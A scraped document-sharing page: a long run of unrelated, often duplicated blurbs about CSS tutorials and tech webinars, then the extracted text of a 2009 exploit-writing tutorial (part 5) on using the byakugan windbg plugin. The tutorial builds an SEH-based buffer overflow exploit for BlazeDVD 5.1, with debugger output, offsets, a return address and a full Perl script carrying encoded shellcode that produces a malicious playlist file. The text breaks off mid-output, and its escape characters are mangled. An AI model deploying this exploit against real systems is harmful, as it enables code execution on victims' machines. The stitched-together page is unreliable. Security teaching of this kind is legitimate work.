Similar to exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development (20)
This document provides a help and tutorial for TopStyle Pro version 3.11. It covers getting started with TopStyle, editing style sheets and HTML/XHTML, working with colors, previews, validation, site management, reports, mappings, customization, and third-party integration. It also includes appendices on CSS basics and tips, TopStyle tips and tricks, style sheet resources, keyboard shortcuts, and regular expressions.
TopStyle Help & <b>Tutorial</b>tutorialsruby
This document provides a table of contents for the TopStyle Pro Help & Tutorial, which teaches how to use the TopStyle software for editing style sheets and HTML/XHTML documents. It lists over 50 sections that provide explanations and instructions for features like creating and opening files, editing styles, working with colors, previews, validation, site management, reports and customizing the software. The document was created by Giampaolo Bellavite from the online help provided with TopStyle version 3.11.
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting <b>...</b>tutorialsruby
This document provides the course outline for IMD 210 Fundamentals of Scripting Languages at The Art Institute of Atlanta during the Spring 2005 quarter. The course focuses on integrating programming concepts with interface design using scripting languages like JavaScript and CSS. It will cover topics like DOM, CSS layout, JavaScript variables, conditionals, and events. Students will complete 4 assignments including redesigning existing websites, and there will be weekly quizzes, a midterm, and final exam. The course is worth 4 credits and meets once a week for class and lab.
This document provides the course outline for IMD 210 Fundamentals of Scripting Languages at The Art Institute of Atlanta during the Spring 2005 quarter. The course focuses on integrating programming concepts with interface design using scripting languages like JavaScript and CSS. It will cover topics like DOM, CSS layout, JavaScript variables, conditionals, and events. Students will complete 4 assignments including redesigning existing websites, and there will be weekly quizzes, a midterm, and final exam. The course is worth 4 credits and meets once a week for class and lab.
The group aims to bridge gaps between peer-to-peer database architectures and scaling multimedia information retrieval. They develop a probabilistic multimedia database system with abstraction layers for applications and researchers. They also research challenges of peer-to-peer networks for distributed data management. Both lines are supported by the MonetDB platform to exploit custom hardware and adaptive query optimization. The goal is a modular solution linking theoretical optimal solutions to application demands under resource limitations.
Standardization and Knowledge Transfer – INS0tutorialsruby
The group aims to bridge gaps between peer-to-peer database architectures and scaling multimedia information retrieval. They develop a probabilistic multimedia database system with abstraction layers and a flexible model. They also research challenges of peer-to-peer networks for distributed data management. Both lines are supported by the MonetDB platform to exploit custom hardware and adaptive query optimization. The goal is a modular solution linking theoretical optimal solutions to application demands under resource limitations.
This document provides an introduction to converting HTML documents to XHTML, including the basic syntax changes needed like making all tags lowercase and closing all tags. It provides examples of correct XHTML markup for different tags. It also explains the new DOCTYPE declaration and shows a sample well-formed XHTML document incorporating all the discussed changes. Resources for learning more about XHTML are listed at the end.
This document provides an introduction to converting HTML documents to XHTML, including the basic syntax changes needed like making all tags lowercase and closing all tags. It provides examples of correct XHTML markup for different tags. It also explains the new DOCTYPE declaration and shows a sample well-formed XHTML document incorporating all the discussed changes. Resources for learning more about XHTML are listed at the end.
XHTML is a markup language that provides structure and semantics to web pages. It is based on XML and is more strict than HTML. XHTML pages must have a document type definition, html and head tags, and a body where the visible content goes. Common XHTML tags include paragraphs, lists, links, images, and divisions to logically separate content. While XHTML provides structure, CSS is used to style pages and control visual presentation by defining rules for tags. CSS rules are defined in external style sheets to keep presentation separate from structure and content.
XHTML is a markup language that provides structure and semantics to web pages. It is based on XML and is more strict than HTML. XHTML pages must have a document type definition, html and head tags, and a body where the visible content goes. Common XHTML tags include paragraphs, lists, links, images, and divisions to logically separate content. While XHTML provides structure, CSS is used to style pages and control visual presentation through rules that target specific XHTML elements.
This document discusses how to create and use external cascading style sheets (CSS) in Dreamweaver. It provides steps to:
1. Open the CSS Styles tab in Dreamweaver and create a new external CSS stylesheet using a sample text style.
2. Save the stylesheet and link it to a new HTML page to style elements like headings, text sizes, and boxes.
3. Edit existing styles by selecting a tag in the CSS Styles panel and modifying properties directly, or by clicking the tag and using the pencil icon to edit in a window. This allows customizing styles globally across all linked pages.
This document provides an overview of how to create and use cascading style sheets (CSS) in Dreamweaver. It describes the different types of style sheets, including external and internal style sheets. It outlines the steps to create an external style sheet in Dreamweaver using the CSS Styles panel and provides instructions for linking the external style sheet to an HTML page. The document demonstrates how to experiment with predefined styles and how to edit, add, and delete styles in the CSS stylesheet.
This document appears to be a weekly update from an intro to computer science course. It includes summaries of classmates' demographics, comfort levels, and prior experience. It also discusses time spent on problem sets and recommends upcoming courses in CS51 and CS61. Finally, it recommends reading on TCP/IP, HTTP, XHTML, CSS, PHP, SQL and using the bulletin board for questions.
This document appears to be a weekly update from an intro to computer science course. It includes summaries of classmates' demographics, comfort levels, and prior experience. It also discusses time spent on problem sets and recommends upcoming courses in CS51 and CS61. Finally, it recommends reading on topics like TCP/IP, HTTP, XHTML, CSS, PHP, SQL and using bulletin boards, and includes images related to these topics.
The document discusses how to use Cascading Style Sheets (CSS) with Corvid Servlet Runtime templates to control formatting and layout. CSS allows separating design from content, making templates simpler and easier to maintain. It also enables adapting appearance for different devices. The document provides examples of using CSS classes to style template elements and explains how to set up a demo system using the included CSS and templates.
The document discusses how to use Cascading Style Sheets (CSS) with Corvid Servlet Runtime templates to control formatting and layout. CSS allows separating design from content, making templates simpler and easier to maintain. It also enables customization of appearance for different devices. The document provides examples of how to apply CSS classes and rules to Corvid template elements to control fonts, colors, positioning and more.
The document provides an introduction to CSS and how it works with HTML to control the presentation and styling of web page content. It explains basic CSS concepts like selectors, properties and values, and how CSS rules are used to target specific HTML elements and style them. Examples are given of common CSS properties and selectors and how they can be used to style elements and format the layout of web pages.
The document introduces CSS and how it works with HTML to separate content from presentation, allowing the styling of web pages through rules that target HTML elements. It explains CSS syntax and various selectors like type, class, ID, and descendant selectors. Examples are provided of how CSS can be used to style properties like color, font, padding, and layout of elements on a page.
Cascading Style Sheets (CSS) allow users to define how HTML elements are presented on a page. CSS enables changing the appearance and layout of an entire website by editing just one CSS file. CSS uses selectors to apply styles to HTML elements via properties and values. Styles can be defined internally in HTML or externally in CSS files. CSS can control text formatting, colors, spacing, positioning and more to achieve visual consistency across web pages.
Cascading Style Sheets (CSS) allow users to define how HTML elements are presented on a page. CSS enables changing the appearance and layout of an entire website by editing just one CSS file. CSS uses selectors to apply styles to HTML elements via properties and values. Styles can be defined internally in HTML or externally in CSS files. CSS can control text formatting, colors, spacing, positioning and more to achieve visual consistency across web pages.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/how-axelera-ai-uses-digital-compute-in-memory-to-deliver-fast-and-energy-efficient-computer-vision-a-presentation-from-axelera-ai/
Bram Verhoef, Head of Machine Learning at Axelera AI, presents the “How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-efficient Computer Vision” tutorial at the May 2024 Embedded Vision Summit.
As artificial intelligence inference transitions from cloud environments to edge locations, computer vision applications achieve heightened responsiveness, reliability and privacy. This migration, however, introduces the challenge of operating within the stringent confines of resource constraints typical at the edge, including small form factors, low energy budgets and diminished memory and computational capacities. Axelera AI addresses these challenges through an innovative approach of performing digital computations within memory itself. This technique facilitates the realization of high-performance, energy-efficient and cost-effective computer vision capabilities at the thin and thick edge, extending the frontier of what is achievable with current technologies.
In this presentation, Verhoef unveils his company’s pioneering chip technology and demonstrates its capacity to deliver exceptional frames-per-second performance across a range of standard computer vision networks typical of applications in security, surveillance and the industrial sector. This shows that advanced computer vision can be accessible and efficient, even at the very edge of our technological ecosystem.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/temporal-event-neural-networks-a-more-efficient-alternative-to-the-transformer-a-presentation-from-brainchip/
Chris Jones, Director of Product Management at BrainChip , presents the “Temporal Event Neural Networks: A More Efficient Alternative to the Transformer” tutorial at the May 2024 Embedded Vision Summit.
The expansion of AI services necessitates enhanced computational capabilities on edge devices. Temporal Event Neural Networks (TENNs), developed by BrainChip, represent a novel and highly efficient state-space network. TENNs demonstrate exceptional proficiency in handling multi-dimensional streaming data, facilitating advancements in object detection, action recognition, speech enhancement and language model/sequence generation. Through the utilization of polynomial-based continuous convolutions, TENNs streamline models, expedite training processes and significantly diminish memory requirements, achieving notable reductions of up to 50x in parameters and 5,000x in energy consumption compared to prevailing methodologies like transformers.
Integration with BrainChip’s Akida neuromorphic hardware IP further enhances TENNs’ capabilities, enabling the realization of highly capable, portable and passively cooled edge devices. This presentation delves into the technical innovations underlying TENNs, presents real-world benchmarks, and elucidates how this cutting-edge approach is positioned to revolutionize edge AI across diverse applications.
AppSec PNW: Android and iOS Application Security with MobSFAjin Abraham
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Essentials of Automations: Exploring Attributes & Automation ParametersSafe Software
Building automations in FME Flow can save time, money, and help businesses scale by eliminating data silos and providing data to stakeholders in real-time. One essential component to orchestrating complex automations is the use of attributes & automation parameters (both formerly known as “keys”). In fact, it’s unlikely you’ll ever build an Automation without using these components, but what exactly are they?
Attributes & automation parameters enable the automation author to pass data values from one automation component to the next. During this webinar, our FME Flow Specialists will cover leveraging the three types of these output attributes & parameters in FME Flow: Event, Custom, and Automation. As a bonus, they’ll also be making use of the Split-Merge Block functionality.
You’ll leave this webinar with a better understanding of how to maximize the potential of automations by making use of attributes & automation parameters, with the ultimate goal of setting your enterprise integration workflows up on autopilot.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
1. http://www.corelan.be:8800 - Page 1 / 20
Peter Van Eeckhoutte´s Blog
I explain stuff... (or at least, I try to) - :: [Knowledge is not an object, it´s a flow] ::
Exploit writing tutorial part 5 : How debugger modules & plugins can
speed up basic exploit development
Peter Van Eeckhoutte · Saturday, September 5th, 2009
In the first parts of this exploit writing tutorial, I have mainly used Windbg as a tool to watch
registers and stack contents while evaluating crashes and building exploits.
Today, I will discuss some other debuggers and debugger plugins that will help you speed up this
process.
A typical exploit writing toolkit arsenal should at least contain the following tools :
q windbg (for a list of Windbg commands, click here)
q ollydbg
q immunity debugger (requires python)
q metasploit
q pyDbg (if you are using python and want to build your own custom debugger, as explained in the
awesome Gray Hay Python book
q scripting tools such as perl / python, etc
In the previous chapters, we have already played with windbg, and I have briefly discussed a
windbg extension / plugin from Microsoft, which will evaluate crashes and will tell you if they
think the crash is exploitable or not. This plugin (MSEC) can be downloaded from
http://www.codeplex.com/msecdbg. While MSEC can be handy to give you a first impression,
don’t rely on it too much. It’s always better to manually look at registers, stack values, and try to
see if a vulnerability can lead to code execution or not.
Byakugan : introduction, pattern_offset and searchOpcode
Everybody knows that ollydbg has numerous plugins (I’ll talk about these plugins later). Windbg
also has a framework/API for building plugins/extension. MSEC was just one example…
Metasploit has built & released their own windbg plugin about a year ago, called byakugan.
Pre-compiled binaries for WIndows XP SP2, SP3, Vista and Windows 7 can be found in the
framework3 folder (get latest trunk via svn), under externalsourcebyakuganbin
Place byakugan.dll and injectsu.dll under the windbg application folder (not under winext !), and
put detoured.dll under c:windowssystem32
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 1 / 20
2. http://www.corelan.be:8800 - Page 2 / 20
What can you do with byakugan.dll ?
q jutsu : set of tools to track buffers in memory, determining what is controlled at crash time, and
discover valid return addresses
q pattern_offset
q mushishi : framework for anti-debugging detection and defeating anti-debugging techniques
q tenketsu : vista heap emulator/visualizer.
Injectsu.dll handles hooking of API functions in the target process. It creates a
back-channel-information-gathering-thread which connects to the debugger.
Detoured.dll is a Microsoft Research hooking library, and handles trampoline code, keeps track of
hooked functions and provides auto fix-ups on function trampolines.
Today, I will only look at byakugan, more specifically the jutsu component (because I can use
techniques explained in the first parts of this tutorial series to demonstrate the features of that
component) and pattern_offset.
You can load the byakugan module in windbg using the following command :
0:000> !load byakugan
[Byakugan] Successfully loaded!
The jutsu component offers the following functions :
q identBuf / listBuf / rmBuf : find buffers (plain ascii, metasploit patterns, or data from file) in
memory…
q memDiff : compare data in memory with a pattern and mark the changes. This will help you
determining whether e.g. shellcode has been changed/corrupted in memory, whether certain ‘bad
characters’ need to be excluded from shellcode, etc
q hunt
q findReturn : search for the addresses that point to a usable function to return to.
q searchOpcode : converts assembler instruction to opcode, AND it lists all executable opcode sequence
addresses at the same time.
q searchVtptr
q trackVal
In addition to jutsu, there’s pattern_offset, which allows you to find a metasploit pattern in memory
and shows the offset to eip
In order to demonstrate how byakugan can speed up the exploit development process, we’ll use a
vulnerability found in BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0, where a malformed plf
file leads to a stack buffer overflow.
We’ll try to build a working exploit with only one crash :-)
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 2 / 20
3. http://www.corelan.be:8800 - Page 3 / 20
Get yourself a copy of BlazeDVD 5 Professional from http://www.blazevideo.com/download.htm
A local copy of this vulnerable application can be downloaded here :
[download id=40]
Usually, we would start with building a payload that contains lots of A’s. But this time we will use
a metasploit pattern right away.
Create a metasploit pattern that contains 1000 characters and save the pattern in a file (e.g.
blazecrash.plf) :
peter@sploitbuilder1 ~/framework-3.2/tools
$ ./pattern_create.rb 1000 > blazecrash.plf
Launch windbg, and execute blazedvd from within windbg. (This will make sure that, if the
application crashes, windbg will catch it). Push the application out of the breakpoint (you may
have to press F5 a couple of times (about 27 times on my system) to launch the application). When
blazeDVD is launched, open the plf file (which only contains the metasploit pattern). When the
application dies, press F5 again.
You should get something like this :
(5b0.894): Access violation(5b0.894): Access violation - code c0000005 (first chance)
- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=062ddcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
Now it’s time to use byakugan. Load the byakugan module and see if it can find the metasploit
pattern somewhere :
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 1000
[Byakugan] Control of ecx at offset 612.
[Byakugan] Control of eip at offset 612.
Cool. Not only have we validated the buffer overflow, but we alo know the offset, all in one run. It
looks like we have overwritten RET… but before concluding that this is a plain RET overwrite,
always run !exchain, just to verify.
0:000> !exchain
0012afe4: 0012afe4: ntdll!ExecuteHandler2+3a (7c9032bc)
ntdll!ExecuteHandler2+3a (7c9032bc)
0012f5b8: 0012f5b8: <Unloaded_ionInfo.dll>+41347540 (41347541)
<Unloaded_ionInfo.dll>+41347540 (41347541)
Invalid exception stack at 33754132
It’s SEH based. The offset shown (612) is the offset to nSEH. So in order to overwrite next SEH,
we need to subtract 4 bytes to get the real offset. (= 608)
We know that a typical SEH based exploit looks like this :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 3 / 20
4. http://www.corelan.be:8800 - Page 4 / 20
[junk][jump][pop pop ret][shellcode]
Let’s find a pop pop ret, and we’ll
q jump 30 bytes (instead of 6 bytes)
q start shellcode with nops (to compensate for the 30 byte jump)
Find pop pop ret : You can still use findjmp, or you can use !jutsu searchOpcode. The only
drawback with !jutsu searchOpcode is that you’ll have to specify the registers (with findjmp, you’ll
get all pop pop ret combinations). But let’s use searchOpcode anyway. We’ll look for pop esi, pop
ebx, ret
0:000> !jutsu searchOpcode pop esi | pop ebx | ret
[J] Searching for:
> pop esi
> pop ebx
> ret
[J] Machine Code:
> 5e 5b c3
[J] Executable opcode sequence found at: 0x05942a99
[J] Executable opcode sequence found at: 0x05945425
[J] Executable opcode sequence found at: 0x05946a1e
[J] Executable opcode sequence found at: 0x059686a0
[J] Executable opcode sequence found at: 0x05969d91
[J] Executable opcode sequence found at: 0x0596aaa6
[J] Executable opcode sequence found at: 0x1000467f
[J] Executable opcode sequence found at: 0x100064c7
[J] Executable opcode sequence found at: 0x10008795
[J] Executable opcode sequence found at: 0x1000aa0b
[J] Executable opcode sequence found at: 0x1000e662
[J] Executable opcode sequence found at: 0x1000e936
[J] Executable opcode sequence found at: 0x3d937a1d
[J] Executable opcode sequence found at: 0x3d93adf5
… (etc)
Look for addresses in the address range of one of the executable modules / dll’s from BlazeDVD.
(you can get the list of executable modules with windbg’s “lm” command). On my system (XP
SP3 En), addresses starting with 0x64 will work fine. We’ll use 0x640246f7
0:000> u 0x640246f7
MediaPlayerCtrl!DllCreateObject+0x153e7:
640246f7 5e pop esi
640246f8 5b pop ebx
640246f9 c3 ret
Let’s build our exploit :
my $sploitfile="blazesploit.plf";
my $junk = "A" x 608; #612 - 4
my $nseh = "xebx1ex90x90"; #jump 30 bytes
my $seh = pack('V',0x640246f7); #pop esi, pop ebx, ret
my $nop = "x90" x 30; #start with 30 nop's
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 4 / 20
5. http://www.corelan.be:8800 - Page 5 / 20
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$nseh.$seh.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
Try it - works fine on my system.
This was a pretty straigthforward example.. and perhaps we got lucky this time, because there are a
number of drawbacks when building an exploit almost blindly, purely based on the output of the
byakugan features :
q we don’t know if the address used for the pop pop ret is in a module that is compiled with safeseh. I
have spoken with Lurene Grenier (who has written byakugan) and this is one of the features on his to
do list. (He also mentioned that he will try to build in aslr awareness and some kind of
wildcard/exclusion support)
q we did not validate the shellcode placement (but by jumping 30 bytes and using nop’s, we have
increased our chances slightly)
q if the exploit doesn’t work (because of shellcode corruption or small buffers), we’ll have to do the
work all over again, manually this time.
But still, if it works, then you have saved yourself a lot of time
Byakugan : memDiff
Let’s use the same vulnerability/exploit to discuss some of the other features of byakugan.
We’ll use the same sploit, but instead of doing the jump (0xeb,0x1e), we’ll put in 2 breakpoints
(0xcc,0xcc), so we can observe if our original shellcode matches with what we have put in memory
(so we can identify shellcode corruption and possible bad characters).
First, we will simply compare the shellcode in memory with the original shellcode, and, to
demonstrate the diff functionalities, we’ll modify the shellcode (so we can see the differences)
We need to put the shellcode in a text file (not in ascii, but write the bytes/binary to the text file) :
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 5 / 20
7. http://www.corelan.be:8800 - Page 7 / 20
The windbg output did not show any bold characters, so we have an identical match (as expected).
Now modify the exploit script and change some random shellcode bytes, and do the exercise again.
(I have replaced all x43’s with x44 - 24 replacements in total)
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu memDiff file 302 c:sploitsblazevideoshell.txt 0x0012f5de
ACTUAL EXPECTED
ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 44 44 44 ffffff89 ffffffe3 ffffffdb
ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 43 43 43
44 44 44 51 5a 56 54 58 33 30 56 58 34 41 50 30 43 43 43 51 5a 56 54 58 33 30 56 58 34 41 50 30
41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41
51 32 41 42 32 42 42 30 42 42 58 50 38 41 44 4a 51 32 41 42 32 42 42 30 42 42 58 50 38 41 43 4a
4a 49 4b 4c 4b 58 51 54 44 30 45 50 45 50 4c 4b 4a 49 4b 4c 4b 58 51 54 43 30 45 50 45 50 4c 4b
47 35 47 4c 4c 4b 44 4c 44 35 44 38 44 31 4a 4f 47 35 47 4c 4c 4b 43 4c 43 35 44 38 43 31 4a 4f
4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b
